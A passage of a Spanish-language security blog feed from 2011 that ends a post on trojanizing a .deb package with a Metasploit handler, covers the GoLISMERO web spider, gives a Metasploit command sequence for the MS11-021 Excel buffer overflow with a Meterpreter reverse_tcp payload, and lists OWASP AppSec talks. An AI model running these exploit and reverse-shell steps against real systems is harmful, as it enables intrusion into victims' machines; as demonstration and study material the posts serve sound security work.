&lt;pre&gt;&lt;code&gt;dpkg-deb --build /area/de/trabajo/work&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
* Por último con msfconsole y con multi/handler seleccionamos el payload con el que infectaremos, más los parametros de LHOST y LPORT y esperamos a que la víctima lo instale.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Source:&lt;/b&gt; &lt;a href="http://zerialkiller.blogspot.com/2010/12/troyanizando-un-paquete-deb-con.html"&gt;http://zerialkiller.blogspot.com/&lt;/a&gt;
&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8845092171963399971-3592992440108692807?l=www.blackploit.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/ClLcHZFHYwPfF5_FLqwWczwL__8/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/ClLcHZFHYwPfF5_FLqwWczwL__8/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/ClLcHZFHYwPfF5_FLqwWczwL__8/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/ClLcHZFHYwPfF5_FLqwWczwL__8/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/C0jNL4tI2lw" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-21T23:18:00.074-03:00</app:edited><media:thumbnail url="http://2.bp.blogspot.com/-GbnhsgKa3T0/TW3FHwlB8TI/AAAAAAAAAQA/NyAXxt8Vgn0/s72-c/metasploit-logo.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2011/11/video-metasploit-troyanizando-un.html</feedburner:origLink></item><item><title>[GoLISMERO] Simplificando tus Auditorías Webs</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/HkO-yUQ1UOE/golismero-simplificando-tus-auditorias.html</link><author>noreply@blogger.com (Zion3R)</author><pubDate>Fri, 18 Nov 2011 03:56:59 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-6840073983786230849</guid><description>&lt;a href="http://4.bp.blogspot.com/-N4UHjyyKE0M/TsGhXUAc6VI/AAAAAAAAAZQ/7HJ4q9ZCsHU/s1600/GoLISMERO_1.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="186" src="http://4.bp.blogspot.com/-N4UHjyyKE0M/TsGhXUAc6VI/AAAAAAAAAZQ/7HJ4q9ZCsHU/s200/GoLISMERO_1.png" width="200" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Hace poco me entero de una gran iniciativa en&amp;nbsp;&lt;a href="http://www.iniqua.com/"&gt;www.iniqua.com&lt;/a&gt;&amp;nbsp;el cual me ha gustado,&amp;nbsp;&lt;b&gt;GoLISMERO&lt;/b&gt; creado por &lt;b&gt;Dani&lt;/b&gt;,&amp;nbsp;que consta principalmente de un spiders de urls que ayuda bastante para encontrar posibles SQLi y más. Los dejo con la info:&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: large;"&gt;¿Qué es GoLISMERO?&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
GoLISMERO es un spider web capaz de detectar vulnerabilidades y formatear los resultados de forma muy útil cuando se afronta una auditoría web.&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: large;"&gt;¿Para qué sirve?&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
GoLISMERO está pensado para ser un primer paso cuando comenzamos una auditoría de seguridad web.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Cada vez que nos enfrentamos a una nueva URL, ¿no sería genial poder disponer de forma sencilla y rápida de todos los enlaces, formularios con sus parámetros, detectar posibles URL vulnerables y que además de que se presentasen de manera que nos permita hacernos una idea de la todos los puntos de entrada donde podríamos lanzar ataques? GoLISMERO nos permite hacer todo esto.&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: large;"&gt;Aprendiendo con ejemplos&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
A continuación se exponen diversos ejemplos y casos prácticos, que son la mejor forma de aprender a usar una herramienta de seguridad:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
1.- Extraer todos los enlaces y formularios de una web, con todos sus parámetros, en formato extendido:&lt;/div&gt;
&lt;pre&gt;&lt;code&gt;GoLISMERO.py -t google.com&lt;/code&gt;&lt;/pre&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-N4UHjyyKE0M/TsGhXUAc6VI/AAAAAAAAAZQ/7HJ4q9ZCsHU/s1600/GoLISMERO_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-N4UHjyyKE0M/TsGhXUAc6VI/AAAAAAAAAZQ/7HJ4q9ZCsHU/s1600/GoLISMERO_1.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
2.- Extraer todos los enlaces, en modo compacto y colorear la salida.&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;GoLISMERO.py -c -m -t google.com&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-61qAdm545dk/TsGh3mAr-hI/AAAAAAAAAZY/I44BFmp9SRs/s1600/GoLISMERO_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-61qAdm545dk/TsGh3mAr-hI/AAAAAAAAAZY/I44BFmp9SRs/s1600/GoLISMERO_2.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
3.- Extraer solo los enlaces. Quitando css, javascript, imágenes y direcciones de correo.&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;GoLISMERO.py --no-css--no-script --no-images --no-mail -c -A links -m -t google.com&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
O, formato reducido:&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;GoLISMERO.py -na -c -A links -m -t google.com&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-1QCTMz4cyyw/TsGiqvviDZI/AAAAAAAAAZg/b3xvwOFeRLI/s1600/GoLISMERO_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="540" src="http://4.bp.blogspot.com/-1QCTMz4cyyw/TsGiqvviDZI/AAAAAAAAAZg/b3xvwOFeRLI/s640/GoLISMERO_3.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
4.- Extraer solamente los enlaces que tienen parámetros, seguir las redirecciones (HTTP 302) y exportar en HTML los resultados.&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;GoLISMERO.py -c -A links --follow -F html -o results.html -m -t google.com&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-1cd6fVn-BP8/TsGjHjhA5PI/AAAAAAAAAZo/kmfrGCmHKy4/s1600/GoLISMERO_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-1cd6fVn-BP8/TsGjHjhA5PI/AAAAAAAAAZo/kmfrGCmHKy4/s1600/GoLISMERO_4.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Y el HTML de resultados generado:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-9qVaGoH3oEo/TsGjYOHgJFI/AAAAAAAAAZw/EuOBESwtGEk/s1600/GoLISMERO_5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-9qVaGoH3oEo/TsGjYOHgJFI/AAAAAAAAAZw/EuOBESwtGEk/s1600/GoLISMERO_5.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
5.- Extraer todos los enlaces, buscar URL potencialmente vulnerables y utilizar un proxy intermedio para el análisis. Las URLs o parámetros vulnerables serán resaltados en rojo.&lt;/div&gt;
&lt;pre&gt;&lt;code&gt;GoLISMERO.py -c -A links --follow -na -x -m -t terra.com&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-y-JROZV09Vc/TsGjxAB6ceI/AAAAAAAAAZ4/sr6Z9KV6_og/s1600/GoLISMERO_6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="431" src="http://4.bp.blogspot.com/-y-JROZV09Vc/TsGjxAB6ceI/AAAAAAAAAZ4/sr6Z9KV6_og/s640/GoLISMERO_6.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Comprobamos como ZAP Proxy captura la petición:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-Lsxp9lrA59Q/TsGkI5qGY7I/AAAAAAAAAaA/NuVO-39VO8A/s1600/GoLISMERO_7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="476" src="http://4.bp.blogspot.com/-Lsxp9lrA59Q/TsGkI5qGY7I/AAAAAAAAAaA/NuVO-39VO8A/s640/GoLISMERO_7.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
El proyecto personalmente me gusto mucho, es muy útil para buscar posibles SQLi&amp;nbsp;rápidamente&amp;nbsp;sin tener que hacerlo a mano o recurrir a&amp;nbsp;algún&amp;nbsp;scan lento.&lt;br /&gt;
&lt;br /&gt;
El script es muy rápido y como lo abran notado está hecho en python. Sin duda muy buena iniciativa.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: large;"&gt;Web del proyecto:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;a href="https://code.google.com/p/golismero/"&gt;&lt;span class="Apple-style-span" style="font-size: large;"&gt;https://code.google.com/p/golismero/&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Web del autor:&lt;/b&gt;&amp;nbsp;&lt;a href="http://www.iniqua.com/2011/11/09/golismero-simplificando-las-auditorias-web/"&gt;http://www.iniqua.com/&lt;/a&gt;
&lt;script type="text/javascript"&gt;
&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"&gt;
&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8845092171963399971-6840073983786230849?l=www.blackploit.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/wOBj_NhfV_OPj0I980MYN1U2GaI/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/wOBj_NhfV_OPj0I980MYN1U2GaI/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/wOBj_NhfV_OPj0I980MYN1U2GaI/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/wOBj_NhfV_OPj0I980MYN1U2GaI/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/HkO-yUQ1UOE" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-18T08:56:59.810-03:00</app:edited><media:thumbnail url="http://4.bp.blogspot.com/-N4UHjyyKE0M/TsGhXUAc6VI/AAAAAAAAAZQ/7HJ4q9ZCsHU/s72-c/GoLISMERO_1.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2011/11/golismero-simplificando-tus-auditorias.html</feedburner:origLink></item><item><title>[Video Metasploit] Microsoft Office 2007 Excel .xlb Buffer Overflow</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/-OPwrIkdYZk/metasploit-microsoft-office-2007-excel.html</link><author>noreply@blogger.com (Zion3R)</author><pubDate>Thu, 10 Nov 2011 15:50:59 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-2020123397783779297</guid><description>&lt;div style="text-align: justify;"&gt;
&lt;a href="http://1.bp.blogspot.com/-zL5vae9tRIQ/TrhWNOoa-6I/AAAAAAAAAZA/KwaVcY07SKQ/s1600/ms-office-2007-excel.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="125" src="http://1.bp.blogspot.com/-zL5vae9tRIQ/TrhWNOoa-6I/AAAAAAAAAZA/KwaVcY07SKQ/s200/ms-office-2007-excel.png" width="125" /&gt;&lt;/a&gt;&lt;b&gt;Descripción:&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Este módulo se aprovecha de una vulnerabilidad en Excel de Microsoft Office 2007. Mediante el suministro de un archivo con formato incorrecto *.xlb, un atacante puede controlar el contenido (código) de una rutina de memcpy, y el número de bytes a copiar, causando un stack- based buffer overflow. Esto da como resultado la ejecución de código arbitrario.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;center&gt;&lt;iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/tnbX6JsNaqk" width="640"&gt;&lt;/iframe&gt;&lt;/center&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;script type="text/javascript"&gt;
&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* Bloque 1 */
google_ad_slot = "7923710689";
google_ad_width = 468;
google_ad_height = 60;
//--&gt;
&lt;/script&gt;
&lt;script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"&gt;
&lt;/script&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;Comandos:&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;pre&gt;&lt;code&gt;use exploit/windows/fileformat/ms11_021_xlb_bof
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21

getuid
sysinfo&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Línea de tiempo:&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Vulnerabilidad descubierta y reportado a la ZDI por Aniway&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Vulnerabilidad reportada al proveedor por ZDI el 18/10/2010&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Liberación coordinada de la vulnerabilidad del 04/12/2011&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Metasploit PoC de proporcionado el 11/05/2011&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;PoC proporcionada por:&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Aniway&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
abysssec&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
sinn3r&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
juan vazquez&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Referencias:&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0105"&gt;CVE-2011-0105&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a href="http://technet.microsoft.com/en-us/security/bulletin/MS11-021"&gt;MS11-021&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-121/"&gt;ZDI-11-121&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Versiones afectadas:&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Microsoft Office XP Service Pack 3&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Microsoft Office 2003 Service Pack 3&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Microsoft Office 2007 Service Pack 2&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Microsoft Office 2010 (32 y 64 bits edición)&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Microsoft Office 2004 para Mac&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Microsoft Office 2008 para Mac&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Microsoft Office 2011 para Mac&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Abrir archivos con formatos XML para Mac&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Microsoft Excel Viewer Service Pack 2&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Microsoft Office Compatibility Pack para Word, Excel y PowerPoint 2007 con Service Pack 2&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Probado en Windows XP Pro SP3 con:&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Microsoft Office Excel 2007 (12.0.4518.014)&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;Fuente:&lt;/b&gt;&amp;nbsp;&lt;a href="http://eromang.zataz.com/2011/11/06/ms11-021-microsoft-office-2007-excel-xlb-buffer-overflow-metasploit-demo/"&gt;http://eromang.zataz.com/&lt;/a&gt;&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8845092171963399971-2020123397783779297?l=www.blackploit.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/3STYoA28Ce6-K7Ga6sNvTgVrUKs/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/3STYoA28Ce6-K7Ga6sNvTgVrUKs/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/3STYoA28Ce6-K7Ga6sNvTgVrUKs/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/3STYoA28Ce6-K7Ga6sNvTgVrUKs/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/-OPwrIkdYZk" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-10T20:50:59.718-03:00</app:edited><media:thumbnail url="http://1.bp.blogspot.com/-zL5vae9tRIQ/TrhWNOoa-6I/AAAAAAAAAZA/KwaVcY07SKQ/s72-c/ms-office-2007-excel.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2011/11/metasploit-microsoft-office-2007-excel.html</feedburner:origLink></item><item><title>Presentaciones y Videos OWASP AppSes USA 2011</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/DX0SXbwMZN4/presentaciones-y-videos-owasp-appses.html</link><author>noreply@blogger.com (Zion3R)</author><pubDate>Thu, 03 Nov 2011 18:39:21 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-4199387822386469933</guid><description>&lt;div style="text-align: justify;"&gt;
&lt;a href="http://4.bp.blogspot.com/-BQ11JgVBfI8/TrNBVcROJRI/AAAAAAAAAY4/Vw_sBggFsvw/s1600/OWASP.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="198" src="http://4.bp.blogspot.com/-BQ11JgVBfI8/TrNBVcROJRI/AAAAAAAAAY4/Vw_sBggFsvw/s200/OWASP.png" width="200" /&gt;&lt;/a&gt;Paseándome&amp;nbsp;por la red me encuentro con que se han publicado las presentaciones y videos de la&amp;nbsp;&lt;a _blank"="" href="http://www.appsecusa.org/%20TARGET="&gt;OWASP AppSes USA 2011&lt;/a&gt;, y la verdad es que me gusta mucho la&amp;nbsp;iniciativa&amp;nbsp;OWASP que es un proyecto de código abierto dedicado al seguridad de aplicaciones Web. Si bien la documentación está en ingles, igual les dejo la noticia ya que están muy buenas.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
El pasado 20 al 23 de septiembre se realizó en Minneapolis la OWASP AppSes USA 2011,
 la conferencia más grande de seguridad en aplicaciones y desarrollo de 
software. Ya se encuentran disponibles las presentaciones y videos para 
descarga:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Mark Curphey&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a href="http://www.appsecusa.org/mark_curphey_community_the_killer_app.html" target="_blank"&gt;&lt;/a&gt;&lt;a href="http://www.appsecusa.org/mark_curphey_community_the_killer_app.html" target="_blank"&gt;Community - The Killer App&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.ustream.tv/recorded/17432965%20%20TARGET="&gt;Video - starts at time marker 5:30&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;, &lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/curphey.pdf%20%20TARGET="&gt;PDF&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Andrés Riancho&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#wasp  TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#wasp  TARGET="&gt;Web Application Security Payloads&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/wasp.pdf%20%20TARGET="&gt;PDF&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Andy Murren&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#swacloud  TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#swacloud  TARGET="&gt;SwA and the Cloud - Counting the Risks&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/swacloud.pptx%20%20TARGET="&gt;PPTX&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Patrick Tatro&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#patrolling  TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#patrolling  TARGET="&gt;Principles of Patrolling: Applying Ranger School to Information Security&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/patrolling.pptx%20%20TARGET="&gt;PPTX&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Arian Evans&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#sixkeymetrics  TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#sixkeymetrics  TARGET="&gt;Six Key Metrics: A look at the future of appsec&lt;/a&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Jim Manico&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#xssghosts TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#xssghosts TARGET="&gt;Ghosts of XSS Past, Present and Future&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/xssghosts.pdf%20TARGET="&gt;PDF&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Shankar Babu Chebrolu, PhD, CISSP&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#cloudtopten TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#cloudtopten TARGET="&gt;Top Ten Risks with Cloud that will keep you Awake at Night&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/cloudtopten.pptx%20TARGET="&gt;PPTX&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Ryan W Smith&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
